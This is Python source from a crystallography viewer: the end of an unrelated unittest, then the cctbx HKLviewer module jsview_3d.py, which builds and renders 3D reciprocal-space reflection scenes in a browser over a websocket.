self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
# Test clear protocol when file not found
protocol_util._clear_wireserver_endpoint.reset_mock() # pylint: disable=protected-access
with patch('os.remove') as mock_remove:
protocol_util.clear_protocol()
self.assertEqual(1, protocol_util._clear_wireserver_endpoint.call_count) # pylint: disable=protected-access
self.assertEqual(1, mock_remove.call_count)
self.assertEqual(protocol_file, mock_remove.call_args_list[0][0][0])
if __name__ == '__main__':
unittest.main()
|
jsview_3d.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller, sgtbx
from scitbx import graphics_utils
from scitbx import matrix
import scitbx.math
from libtbx.utils import Sorry, to_str
import threading, math, sys, cmath
if sys.version_info[0] > 2: # using websockets which is superior to websocket_server
from crys3d.hklviewer.WebBrowserMessengerPy3 import WBmessenger
else: # using websocket_server
from crys3d.hklviewer.WebBrowserMessengerPy2 import WBmessenger
import os.path, time, copy
import libtbx
import libtbx.load_env
import webbrowser, tempfile
from six.moves import range
def has_phil_path(philobj, *paths): # variable number of arguments
for path in paths:
if len([ e.path for e in philobj.all_definitions() if path in e.path.split(".") ]):
return True
return False
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
"""
Conpute the hklscene for the miller array, proc_array. If it's a complex array and there is a FOM array
among the list of miller arrays then also compute an hklscene with colours of each hkl attenuated by the
corresponding FOM value.
"""
from iotbx.gui_tools.reflections import ArrayInfo
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, None)]
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("Alert! The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded crystallographically.")
if (settings.inbrowser==True):
settings.expand_anomalous = False
settings.expand_to_p1 = False
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True, mprint=mprint)
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
break
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
hklscene.colors = graphics_utils.NoNansvec3( hklscene.colors, 1.0, 1.0, 1.0)
hklscene.radii = graphics_utils.NoNansArray( hklscene.radii, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
arrayinfo = ArrayInfo(hklscene.work_array)
scenemindata.append(arrayinfo.minmaxdata[0])
scenemaxdata.append(arrayinfo.minmaxdata[1])
sceneminsigmas.append(arrayinfo.minmaxsigs[0])
scenemaxsigmas.append(arrayinfo.minmaxsigs[1])
lbl = arrayinfo.labelstr
hassigmas=True
if math.isnan(arrayinfo.maxsigmas):
hassigmas=False
if fomslabel:
lbl = arrayinfo.labelstr + " + " + fomslabel
(dummy1, infolst, dummy2, dummy3), dummy4, dummy5 = arrayinfo.get_selected_info_columns_from_phil()
scenearrayinfos.append([infolst, pidx, fidx, lbl, infolst[1], hassigmas])
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.ngl_settings = None #NGLsettings()
self.viewerparams = kwds.get("settings")
self.diff_phil = None
self.params = None
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.lastscene_id = None
self.merge = False
self.primitivetype = "SphereBuffer"
self.url = ""
self.bin_labels_type_idxs = []
self.colour_scene_id = None
self.radii_scene_id = None
self.colours = []
self.positions = []
self.radii2 = []
self.spbufttips = []
self.rot_recip_zvec = None
self.rot_zvec = None
self.meanradius = -1
self.past = time.time()
self.orientmessage = None
self.clipNear = None
self.clipFar = None
self.cameraPosZ = None
self.boundingX = None
self.boundingY = None
self.boundingZ = None
self.OrigClipNear = None
self.OrigClipFar = None
self.cameratranslation = ( 0,0,0 )
#self.angle_x_svec = 0.0
#self.angle_y_svec = 0.0
self.angle_z_svec = 0.0
#self.angle_z_yzvec = 0.0
#self.angle_y_yzvec = 0.0
#self.angle_y_xyvec = 0.0
self.angle_x_xyvec = 0.0
self.vecrotmx = None
self.currentrotvec = None
self.unit_h_axis = None
self.unit_k_axis = None
self.unit_l_axis = None
self.normal_hk = None
self.normal_kl = None
self.normal_lh = None
self.isnewfile = False
self.has_new_miller_array = False
self.sleeptime = 0.01 # 0.025
self.colstraliases = ""
self.binvals = []
self.binvalsboundaries = []
self.oldnbinvalsboundaries = None
self.proc_arrays = []
self.HKLscene = []
self.HKLscenes = []
self.HKLscenedict = {}
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.bindata = None
self.reciproc_scale = 1.0
self.realspace_scale = 1.0
self.visual_symHKLs = []
self.visual_symmxs= []
self.sceneisdirty = True
self.imagename = None
self.imgdatastr = ""
self.hkl_scenes_info = []
self.hkl_scenes_infos = []
self.match_valarrays = []
self.array_info_format_tpl = []
self.binstrs = []
self.rotation_operators = []
self.all_vectors = []
self.nuniqueval = 0
self.bin_infotpls = []
self.mapcoef_fom_dict = {}
# colourmap=brg, colourpower=1, powerscale=1, radiiscale=1
self.datatypedefault = ["brg", 1.0, 1.0, 1.0]
self.datatypedict = { }
self.sceneid_from_arrayid = []
self.parent = None
if 'parent' in kwds:
self.parent = kwds['parent']
self.verbose = 0
if 'verbose' in kwds:
self.verbose = eval(kwds['verbose'])
self.debug = None
if 'debug' in kwds:
self.debug = kwds['debug']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbinvalsboundaries = 0
self.websockport = 7894
if 'websockport' in kwds:
self.websockport = kwds['websockport']
tempdir = tempfile.gettempdir()
# ensure unique file name by including port number in filename
self.hklfname = os.path.join(tempdir, "hkl_%d.htm" %self.websockport )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds and kwds['htmlfname']:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.isHKLviewer= "false"
self.send_info_to_gui = None
if 'send_info_to_gui' in kwds:
self.send_info_to_gui = kwds['send_info_to_gui']
self.isHKLviewer= "true"
if 'fileinfo' in kwds:
return
self.mprint('Rendering done via websocket in \"%s\"' %self.hklfname)
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta charset="utf-8" /></head>
<body>
<script>var isHKLviewer = %s; </script>
<script>var websocket_portnumber = %s; </script>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
<div id="viewport" style="width:100%%; height:100%%;"></div>
</body></html>
"""
Html2Canvaslibpath = libtbx.env.under_dist("crys3d","hklviewer/html2canvas.min.js")
#Threejslibpath = libtbx.env.under_dist("crys3d","hklviewer/three.js")
NGLlibpath = libtbx.env.under_dist("crys3d","hklviewer/ngl.js")
HKLjscriptpath = libtbx.env.under_dist("crys3d","hklviewer/HKLJavaScripts.js")
HKLjscriptpath = os.path.abspath( HKLjscriptpath)
Html2Canvasliburl = "file:///" + Html2Canvaslibpath.replace("\\","/")
#Threejsliburl = "file:///" + Threejslibpath.replace("\\","/")
NGLliburl = "file:///" + NGLlibpath.replace("\\","/")
HKLjscripturl = "file:///" + HKLjscriptpath.replace("\\","/")
self.htmlstr = self.hklhtml %(self.isHKLviewer, self.websockport, Html2Canvasliburl,
NGLliburl, HKLjscripturl)
self.colourgradientvalues = []
self.UseOSBrowser = ""
if 'useGuiSocket' not in kwds:
self.UseOSBrowser = "default"
ldic=locals()
if 'UseOSBrowser' in kwds:
exec("UseOSBrowser = kwds['UseOSBrowser']", globals(), ldic)
self.UseOSBrowser = ldic["UseOSBrowser"]
self.UseOSBrowser = self.UseOSBrowser.replace("\\","/")
self.viewmtrx = None
self.lastviewmtrx = None
self.currentRotmx = matrix.identity(3)
self.HKLsceneKey = ( 0, False, self.viewerparams.expand_anomalous, self.viewerparams.expand_to_p1 )
self.handshakewait = 5
if 'handshakewait' in kwds:
self.handshakewait = eval(kwds['handshakewait'])
self.lastmsg = "" # "Ready"
self.boundingbox_msg_sem = threading.Semaphore()
self.clipplane_msg_sem = threading.Semaphore()
self.mousespeed_msg_sem = threading.Semaphore()
self.WBmessenger = WBmessenger(self)
self.AddToBrowserMsgQueue = self.WBmessenger.AddToBrowserMsgQueue
self.WBmessenger.StartWebsocket()
self.javascriptcleaned = False
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.JavaScriptCleanUp()
self.SendInfoToGUI( { "datatype_dict": self.datatypedict } ) # so the GUI can persist these across sessions
nwait = 0
if self.viewerparams.scene_id is None:
self.WBmessenger.StopWebsocket()
while not self.WBmessenger.isterminating and nwait < 5:
time.sleep(self.sleeptime)
nwait += self.sleeptime
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
self.mprint("Destroying hklview_3d", 1)
def SendInfoToGUI(self, mydict):
if self.send_info_to_gui:
self.send_info_to_gui( mydict )
def update_settings(self, diff_phil, curphilparam) :
"""
Event handler for zmq messages from the GUI or simply for commandline interaction when
scripting HKLviewer with python
"""
self.ngl_settings = curphilparam.NGL
self.viewerparams = curphilparam.viewer
self.params = curphilparam
self.diff_phil = diff_phil
if has_phil_path(diff_phil,
"openfilename",
"use_provided_miller_arrays",
"spacegroup_choice",
"using_space_subgroup",
"merge_data",
"camera_type",
"miller_array_operations",
) \
or has_phil_path(diff_phil, "viewer") \
and has_phil_path(diff_phil,
"show_missing",
"show_only_missing",
"show_systematic_absences",
"slice_axis",
"slice_mode",
"slice_index",
"sigma_color_radius",
"scene_id",
"color_scheme",
"color_powscale",
"scale",
"nth_power_scale_radii"
) \
or self.viewerparams.inbrowser==False and \
( has_phil_path(diff_phil,
"expand_anomalous",
"expand_to_p1",
"show_anomalous_pairs")
):
self.sceneisdirty = True
if has_phil_path(diff_phil,
"spacegroup_choice",
"show_missing",
"show_only_missing",
"show_systematic_absences",
"slice_axis",
"slice_mode",
"slice_index",
"sigma_color_radius",
"scene_id",
"use_provided_miller_arrays",
"color_scheme",
"color_powscale",
"scale",
"nth_power_scale_radii"
):
self.ConstructReciprocalSpace(curphilparam, scene_id=self.viewerparams.scene_id )
else:
self.ConstructReciprocalSpace(curphilparam )
msg = ""
if self.viewerparams.scene_id is not None and \
( has_phil_path(diff_phil,
"show_missing",
"show_only_missing",
"show_systematic_absences",
"binner_idx",
"nbins",
)
) and not has_phil_path(diff_phil, "scene_bin_thresholds") :
self.binvals, self.nuniqueval = self.calc_bin_thresholds(curphilparam.binner_idx,
curphilparam.nbins)
self.sceneisdirty = True
if has_phil_path(diff_phil, "scene_bin_thresholds"):
self.sceneisdirty = True
if has_phil_path(diff_phil,
"color_scheme",
"color_powscale",
"scale",
"nth_power_scale_radii"
):
self.add_colour_map_radii_power_to_dict()
if has_phil_path(diff_phil, "camera_type"):
self.set_camera_type()
if has_phil_path(diff_phil, "show_hkl"):
self.show_hkl()
if has_phil_path(diff_phil, "show_tooltips"):
self.set_show_tooltips()
if has_phil_path(diff_phil, "tooltip_alpha"):
self.set_tooltip_opacity()
if has_phil_path(diff_phil, "show_symmetry_rotation_axes"):
self.show_rotation_axes()
if has_phil_path(diff_phil, "show_vector"):
self.show_vector()
if has_phil_path(diff_phil, "angle_around_vector"):
self.rotate_around_numbered_vector()
if has_phil_path(diff_phil, "angle_around_XHKL_vector"):
self.rotate_stage_around_cartesian_vector([1,0,0], self.viewerparams.angle_around_XHKL_vector)
self.viewerparams.angle_around_XHKL_vector = None
if has_phil_path(diff_phil, "angle_around_YHKL_vector"):
self.rotate_stage_around_cartesian_vector([0,1,0], self.viewerparams.angle_around_YHKL_vector)
self.viewerparams.angle_around_YHKL_vector = None
if has_phil_path(diff_phil, "angle_around_ZHKL_vector"):
self.rotate_stage_around_cartesian_vector([0,0,1], self.viewerparams.angle_around_ZHKL_vector)
self.viewerparams.angle_around_ZHKL_vector = None
if has_phil_path(diff_phil, "animate_rotation_around_vector"):
self.animate_rotate_around_vector()
if has_phil_path(diff_phil, "miller_array_operations"):
self.viewerparams.scene_id = len(self.hkl_scenes_infos)-1
self.viewerparams.sigma_color_radius = False
self.set_scene()
self.params.miller_array_operations = ""
if has_phil_path(diff_phil, "fixorientation", "slice_axis") and \
self.viewerparams.slice_mode and self.viewerparams.fixorientation == "reflection_slice":
# explicit slicing is not volatile
if self.viewerparams.slice_axis=="h": hkl = [1,0,0]
if self.viewerparams.slice_axis=="k": hkl = [0,1,0]
if self.viewerparams.slice_axis=="l": hkl = [0,0,1]
R = hkl[0] * self.normal_kl + hkl[1] * self.normal_lh - hkl[2] * self.normal_hk
self.orient_vector_to_screen(R[0])
if has_phil_path(diff_phil,
"spacegroup_choice",
"use_provided_miller_arrays",
"scene_bin_thresholds", # TODO: group bin phil parameters together in subscope
"bin_opacities",
"binner_idx",
"nbins",
"fontsize",
"miller_array_operations",
"mouse_sensitivity",
"real_space_unit_cell_scale_fraction",
"reciprocal_unit_cell_scale_fraction",
"clip_plane",
"viewer") and self.viewerparams.scene_id is not None:
# any change to parameters in the master phil in display2.py
self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
self.DrawNGLJavaScript()
self.mprint( "Rendered %d reflections" % self.scene.points.size(), verbose=1)
self.set_volatile_params()
if self.viewerparams.scene_id is None:
self.DrawNGLJavaScript(blankscene=True)
return curphilparam
def set_volatile_params(self):
"""
Change the view of the reflections according to whatever the values are of the volatile parameters.
Volatile parameters are those that do not require heavy computing (like position of WebGL primitives)
but can change the appearance of primitives instantly like opacity or clipplane position. Expansion
in browser of coordinates to P1 are also considered volatile as this operation is very fast.
"""
if self.viewerparams.scene_id is not None:
if has_phil_path(self.diff_phil, "angle_around_vector"): # no need to redraw any clip plane
return
if self.viewerparams.fixorientation == "vector":
self.orient_vector_to_screen(self.currentrotvec)
self.SetMouseSpeed(self.ngl_settings.mouse_sensitivity)
hkldist = -1
clipwidth = None
self.fix_orientation()
uc = self.miller_array.unit_cell()
if self.params.clip_plane.clipwidth and not self.viewerparams.slice_mode:
clipwidth = self.params.clip_plane.clipwidth
hkldist = self.params.clip_plane.hkldist
msg = ""
if self.params.clip_plane.normal_vector != -1:
# cartvec is reciprocal vector in cartesian coordinates
cartvec = self.all_vectors[ self.params.clip_plane.normal_vector ][3]
# hklvec is reciprocal vector in reciprocal coordinates.
# First try and see if they are stored in self.all_vectors[..][5].
# If not then convert the cartesian representation cartvec of hklvec
# into the reciprocal coordinates
try:
hklvec = eval(self.all_vectors[ self.params.clip_plane.normal_vector ][5])
except Exception as e:
hklvec = roundoff(list(matrix.sqr(uc.orthogonalization_matrix()).transpose() * cartvec/self.scene.renderscale))
# Get corresponding real space vector to the hkl vector (as cartesian coordinates)
real_space_vec = hklvec * matrix.sqr(uc.orthogonalization_matrix())
# In the general case real_space_vec is not parallel to hklvec
# Orient the clip plane perpendicular to real_space_vec while at the
# same time slide clip plane along the cartvec (reciprocal vector) direction
# in units of cartvec projected onto real_space_vec
self.mprint("clip plane perpendicular to hkl direction: %s" %str(hklvec))
self.orient_vector_to_screen(real_space_vec)
L = math.sqrt( cartvec[0]*cartvec[0] + cartvec[1]*cartvec[1] + cartvec[2]*cartvec[2] )
if self.params.clip_plane.normal_vector_length_scale > 0:
L = self.params.clip_plane.normal_vector_length_scale
cosine, _, _ = self.project_vector1_vector2(cartvec, real_space_vec)
hkldist = -self.params.clip_plane.hkldist * L *cosine
msg = "Reflections satisfying: %s*h + %s*k + %s*l = %s" %(hklvec[0], hklvec[1], hklvec[2], self.params.clip_plane.hkldist)
self.AddToBrowserMsgQueue("PrintInformation", msg)
self.make_clip_plane(hkldist, clipwidth)
if self.viewerparams.inbrowser and not self.viewerparams.slice_mode:
self.ExpandInBrowser()
self.SetOpacities(self.ngl_settings.bin_opacities )
if self.params.real_space_unit_cell_scale_fraction is None:
scale = None
else:
scale = (self.realspace_scale - 1.0)*self.params.real_space_unit_cell_scale_fraction + 1.0
self.DrawUnitCell(scale )
if self.params.reciprocal_unit_cell_scale_fraction is None:
scale = None
else:
scale = (self.reciproc_scale - 1.0)*self.params.reciprocal_unit_cell_scale_fraction + 1.0
self.DrawReciprocalUnitCell(scale )
self.set_tooltip_opacity()
self.set_show_tooltips()
self.visualise_sym_HKLs()
def set_scene(self):
self.binvals = []
if self.viewerparams.scene_id is None:
return False
self.colour_scene_id = self.viewerparams.scene_id
self.radii_scene_id = self.viewerparams.scene_id
self.set_miller_array(self.viewerparams.scene_id)
if (self.miller_array is None):
raise Sorry("No data loaded!")
self.mprint( "Miller array %s runs from hkls: %s to %s" \
%(self.miller_array.info().label_string(), self.miller_array.index_span().min(),
self.miller_array.index_span().max() ) )
self.mprint("Spacegroup: %s" %self.miller_array.space_group().info().symbol_and_number())
return True
def set_miller_array(self, scene_id=None, merge=None, details=""):
if scene_id is not None:
self.viewerparams.scene_id = scene_id
if self.viewerparams and self.viewerparams.scene_id is not None and self.viewerparams.scene_id >= 0 and self.HKLscene:
self.miller_array = self.HKLscene_from_dict(self.viewerparams.scene_id).miller_array
self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
self.merge = merge
if (self.miller_array is None):
return
self.identify_suitable_fomsarrays()
self.GetUnitcellScales()
self.d_min = self.miller_array.d_min()
array_info = self.miller_array.info()
# capture the currently selected spacegroup if not the default
self.sg = self.proc_arrays[self.scene_id_to_array_id(self.viewerparams.scene_id)].space_group()
#self.sg = self.miller_array.space_group()
self.symops = list(self.sg.all_ops())
if len(self.binvals) == 0:
self.binvals = [ 1.0/self.miller_array.d_max_min()[0], 1.0/self.miller_array.d_max_min()[1] ]
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
uc = "a=%g b=%g c=%g angles=%g,%g,%g" % self.miller_array.unit_cell().parameters()
self.mprint( "Data: %s %s, %d reflections in space group: %s, unit Cell: %s" \
% (array_info.label_string(), details, self.miller_array.indices().size(), \
self.miller_array.space_group_info(), uc), verbose=0 )
def Complex2AmplitudesPhases(self, data):
ampls = flex.abs(data)
phases = flex.arg(data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
#b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
#phases = phases.set_selected(b, 42.4242)
phases = graphics_utils.NoNansArray( phases, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
return ampls, phases
def get_rothkl_from_IDs(self, id, sym_id, anomalous=False):
if bool(anomalous):
id = id % len(self.scene.indices)
hkl = self.scene.indices[id]
hklvec = flex.vec3_double( [(hkl[0], hkl[1], hkl[2])])
rotmx=None
if sym_id >= 0 and sym_id < len(self.symops):
# symid tells which symmetry operator was used in HKLJavaScripts.js onMessage() Expand()
rotmx = self.symops[sym_id].r()
Rhkl = hklvec[0]
if rotmx:
# if a symmetry mate was clicked then deduce its hkl coordinate by
# applying the rotation to the original hkl coordinate
Rhkl = hklvec[0] * rotmx
rothkl = Rhkl
if bool(anomalous):
rothkl = (-Rhkl[0], -Rhkl[1], -Rhkl[2])
return rothkl, hkl
def make_visual_symHKLs(self, id, sym_id, anomalous=False):
symid = sym_id
# if a user operator was added then iterate until we find it
#while self.currentsymop != self.symops[symid]:
# symid += 1
rothkl, dummy = self.get_rothkl_from_IDs(id, symid, anomalous) # and use it
if self.visual_symmxs:
# if a list of symmetry matrices have been deduced from a selected rotation operator
# then also compute the other symmetry mates of the current hkl
self.visual_symHKLs = []
for symmx,hklstr in self.visual_symmxs:
vissymrothkl = rothkl * symmx.transpose()
self.visual_symHKLs.append( (vissymrothkl, hklstr) )
def GetTooltipOnTheFly(self, id, sym_id, anomalous=False):
rothkl, hkl = self.get_rothkl_from_IDs(id, sym_id, anomalous)
spbufttip = '\'HKL: [%d,%d,%d]' %(rothkl[0], rothkl[1], rothkl[2])
if rothkl != hkl: # then show the original hkl before P1 or anomalous expansion
spbufttip += ', (asu): [%d,%d,%d]' %(hkl[0], hkl[1], hkl[2])
# resolution and Angstrom character for javascript
spbufttip += '\\ndres: %s \'+ String.fromCharCode(197) +\'' \
%str(roundoff(self.miller_array.unit_cell().d(hkl), 2) )
#for dummykey, (hklscene, maxdat,mindat,maxsig,minsig,info) in self.HKLscenedict.items():
for hklscene in self.HKLscenes:
sigvals = []
datvals = []
if hklscene.isUsingFOMs():
continue # already have tooltips for the scene without the associated fom
if hklscene.work_array.sigmas() is not None:
sigvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).sigmas() )
datval = None
if hkl in hklscene.work_array.indices():
datvals = list( hklscene.work_array.select(hklscene.work_array.indices() == hkl).data() )
else:
if id >= hklscene.data.size():
continue
for i,datval in enumerate(datvals):
if hklscene.work_array.is_hendrickson_lattman_array() and math.isnan(datval[0] + datval[1] + datval[2] + datval[3]):
continue
if not isinstance(datval, tuple) and (math.isnan( abs(datval) ) or datval == display.inanval):
continue
if hklscene.work_array.is_complex_array():
ampl = abs(datval)
phase = cmath.phase(datval) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
# and replace the nan values with an arbitrary float value
if math.isnan(phase):
phase = 42.4242
# Cast negative degrees to equivalent positive degrees
phase = phase % 360.0
spbufttip +="\\n" + hklscene.work_array.info().label_string() + ': '
if hklscene.work_array.is_complex_array():
spbufttip += str(roundoff(ampl, 2)) + ", " + str(roundoff(phase, 2)) + \
"\'+ String.fromCharCode(176) +\'" # degree character for javascript
elif sigvals:
sigma = sigvals[i]
spbufttip += str(roundoff(datval, 2)) + ", " + str(roundoff(sigma, 2))
else:
spbufttip += str(roundoff(datval, 2))
spbufttip += '\\n\\n%d,%d,%d' %(id, sym_id, anomalous) # compared by the javascript
spbufttip += '\''
return spbufttip
def get_col_fomcol(self, idx):
if len(self.HKLInfo_from_dict()) == 0:
return -1, -1
return self.HKLInfo_from_dict(idx)[6], self.HKLInfo_from_dict(idx)[7]
def SupersetMillerArrays(self, origindices):
self.match_valarrays = []
# First loop over all miller arrays to make a superset of hkls of all
# miller arrays. Then loop over all miller arrays and extend them with NaNs
# as to contain the same hkls as the superset
self.mprint("Gathering superset of miller indices...", verbose=1)
superset_array = self.proc_arrays[0].deep_copy()
#set_of_indices = set([])
#for i,procarray in enumerate(self.proc_arrays):
# set_of_indices |= set( list(procarray.indices()) )
#self.mprint("Extending miller arrays to match superset of miller indices...")
#indiceslst = flex.miller_index( list( set_of_indices ) )
indiceslst = origindices
for i,procarray in enumerate(self.proc_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(indiceslst, procarray.indices() )
#matchindices = miller.match_indices( procarray.indices(), indiceslst )
valarray = procarray.select( matchindices.pairs().column(1) )
#if valarray.anomalous_flag() != superset_array.anomalous_flag():
# superset_array._anomalous_flag = valarray._anomalous_flag
#missing = indiceslst.lone_set( valarray.indices() )
#missing = indiceslst.select( miller.match_indices(valarray.indices(), indiceslst ).singles(1))
# insert NAN values for reflections in self.miller_array not found in procarray
#valarray = display.ExtendMillerArray(valarray, missing.size(), missing )
#match_valarray = valarray
#match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
match_valindices = miller.match_indices(indiceslst, valarray.indices() )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
#match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(procarray.info() )
self.match_valarrays.append( match_valarray )
self.mprint("Done making superset", verbose=1)
"""
def SupersetMillerArrays(self):
self.match_valarrays = []
# First loop over all miller arrays to make a superset of hkls of all
# miller arrays. Then loop over all miller arrays and extend them with NaNs
# as to contain the same hkls as the superset
self.mprint("Gathering superset of miller indices...")
superset_array = self.proc_arrays[0].deep_copy()
for i,procarray in enumerate(self.proc_arrays):
if i==0:
continue
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
if valarray.anomalous_flag() != superset_array.anomalous_flag():
superset_array._anomalous_flag = valarray._anomalous_flag
missing = procarray.lone_set( superset_array )
superset_array = display.ExtendMillerArray(superset_array, missing.size(), missing.indices())
self.mprint("Extending miller arrays to match superset of miller indices...")
for i,procarray in enumerate(self.proc_arrays):
# first match indices in currently selected miller array with indices in the other miller arrays
matchindices = miller.match_indices(superset_array.indices(), procarray.indices() )
valarray = procarray.select( matchindices.pairs().column(1) )
if valarray.anomalous_flag() != superset_array.anomalous_flag():
superset_array._anomalous_flag = valarray._anomalous_flag
missing = superset_array.lone_set( valarray )
# insert NAN values for reflections in self.miller_array not found in procarray
valarray = display.ExtendMillerArray(valarray, missing.size(), missing.indices())
match_valindices = miller.match_indices(superset_array.indices(), valarray.indices() )
match_valarray = valarray.select( match_valindices.pairs().column(1) )
match_valarray.sort(by_value="packed_indices")
match_valarray.set_info(procarray.info() )
self.match_valarrays.append( match_valarray )
self.mprint("Done making superset")
"""
def ConstructReciprocalSpace(self, curphilparam, scene_id=None):
sceneid = scene_id
if sceneid is None:
sceneid = self.viewerparams.scene_id
if len(self.proc_arrays) == 0:
return False
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
if self.HKLsceneKey in self.HKLscenedict and not self.has_new_miller_array:
self.HKLscene = self.HKLscenedict.get(self.HKLsceneKey, False)
if self.HKLscene:
self.mprint("Using cached HKL scene", verbose=1)
return True
if self.has_new_miller_array:
self.identify_suitable_fomsarrays()
self.mprint("Constructing HKL scenes", verbose=0)
if scene_id is None:
hkl_scenes_infos = []
self.HKLscenes = []
sceneid = 0
for (idx, arr) in enumerate(self.proc_arrays):
(hklscenes, scenemaxdata,
scenemindata, scenemaxsigmas,
sceneminsigmas, scenearrayinfos
) = MakeHKLscene( arr.deep_copy(), idx, copy.deepcopy(self.viewerparams), self.mapcoef_fom_dict, None, self.mprint )
if len(scenearrayinfos) == 0: # arr does not have valid data
sceneid += 1 # arr does not have valid data still raise the count
for i,inf in enumerate(scenearrayinfos):
self.mprint("%d, %s" %(idx+i+1, inf[0]), verbose=1)
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
sceneid,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
self.HKLscenedict[self.HKLsceneKey] = ( hklscenes[i], scenemaxdata[i],
scenemindata[i], scenemaxsigmas[i], sceneminsigmas[i], inf )
hkl_scenes_infos.append(inf + [sceneid])
self.HKLscenes.append(hklscenes[i])
sceneid += 1
self.hkl_scenes_infos = hkl_scenes_infos
if self.viewerparams.scene_id is not None:
self.HKLsceneKey = (curphilparam.spacegroup_choice,
curphilparam.using_space_subgroup,
curphilparam.merge_data,
self.viewerparams.expand_anomalous or self.viewerparams.inbrowser,
self.viewerparams.expand_to_p1 or self.viewerparams.inbrowser,
self.viewerparams.inbrowser,
self.viewerparams.slice_axis,
self.viewerparams.slice_mode,
self.viewerparams.slice_index,
self.viewerparams.show_missing,
self.viewerparams.show_only_missing,
self.viewerparams.show_systematic_absences,
self.viewerparams.sigma_color_radius,
self.viewerparams.color_scheme,
self.viewerparams.color_powscale,
self.viewerparams.scene_id,
self.viewerparams.scale,
str(self.viewerparams.nth_power_scale_radii)
)
scenearraylabeltypes = [ (e[3], e[4], e[1], e[5], e[6]) for e in hkl_scenes_infos ]
self.SendInfoToGUI({ "scene_array_label_types": scenearraylabeltypes, "NewHKLscenes" : True })
self.bin_labels_type_idxs = []
self.bin_labels_type_idxs.append(("Resolution", "", -1 ))
self.bin_labels_type_idxs.append(("Singletons", "", -1 ))
for label,labeltype,idx,hassigmas,sceneid in scenearraylabeltypes:
if labeltype not in ["Map coeffs", "Map coeffs_fom", "HL coeffs"]:
self.bin_labels_type_idxs.append((label, labeltype, sceneid))
if hassigmas:
self.bin_labels_type_idxs.append(("Sigmas of " + label, "hassigmas", sceneid))
if labeltype == "Map coeffs":
self.bin_labels_type_idxs.append(("Phases of " + label, labeltype, sceneid))
self.bin_labels_type_idxs.append(("Amplitudes of " + label, labeltype, sceneid))
